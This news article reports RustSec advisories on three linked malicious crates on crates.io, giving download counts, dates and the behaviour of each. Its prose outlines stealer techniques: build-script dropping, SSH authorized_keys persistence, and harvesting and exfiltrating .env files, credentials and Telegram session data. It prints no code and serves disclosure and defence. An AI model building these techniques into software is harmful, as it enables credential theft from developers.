RustSec flags malicious crates, supply-chain threat spans three packages

RustSec has flagged three linked crates, pretty-changelog-logger, safe-agent-rs and microsoftsystem64, in a burst that shows the Rust ecosystem is facing a coordinated supply-chain threat, not a one-off bad upload. The three advisories all landed on April 15, after being reported on April 13, and together they covered packages with 2,239, 4,138 and 6,346 downloads, even though none had any crates depending on them on crates.io.

pretty-changelog-logger was the first clear sign of trouble. RustSec said the crate was removed after its build script acted as a loader and dropper for malicious payloads. The package had three versions published on April 8, and Socket.dev was credited with detecting and reporting it to the crates.io team. The name itself was a lure, built to look harmless and useful, which is exactly why it matters to maintainers reviewing dependency trees and build scripts.

safe-agent-rs raised a different red flag. RustSec did not describe it as directly malicious, but said it was owned by the same user as pretty-changelog-logger and microsoftsystem64. It also appeared to imitate another websocket library, a classic pattern in package impersonation. That crate had two versions published on March 24 and 4,138 total downloads, again with no crates depending on it on crates.io.

The most aggressive package was microsoftsystem64. RustSec said it installed a hardcoded SSH authorized_keys entry for persistence, scanned local files including .env data and credential-like JSON names, read their contents, base64-encoded them where needed and exfiltrated the data over HTTP. It also packaged and uploaded Telegram Desktop tdata, a strong indicator of credential and session theft. Socket.dev and sitsh were credited with finding and reporting it. microsoftsystem64 had nine versions published on April 9 and 6,346 downloads.

The larger pattern is what makes this cluster matter. These crates shared ownership, behavior and timing, which points to a deliberate campaign rather than isolated abuse. Rust users have seen this playbook across open-source ecosystems before: impersonate developer tools, get installed during normal workflows and harvest secrets before anyone notices. Socket has said its Contagious Interview research tracked hundreds of malicious npm packages and supporting infrastructure since late 2024, and a contemporaneous disclosure said the same campaign had expanded to crates.io, npm, PyPI, Go modules and Packagist. In practical terms, that means the warning signs are no longer subtle: look for lookalike names, suspicious build scripts, sudden bursts of versions from one account and any package that reaches into credential files long before it ever ships a binary.